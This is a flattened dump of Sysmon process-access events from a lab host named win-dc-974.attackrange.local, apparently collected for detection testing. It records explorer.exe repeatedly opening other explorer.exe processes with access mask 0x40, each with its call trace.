22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694721Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694720Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694719Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694718Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694717Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694716Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694715Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694714Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694713Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694712Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694711Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694710Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694709Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694708Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694707Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694706Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694705Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694704Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694703Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694702Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694701Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694700Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694699Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694698Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694697Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694696Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694695Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694694Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 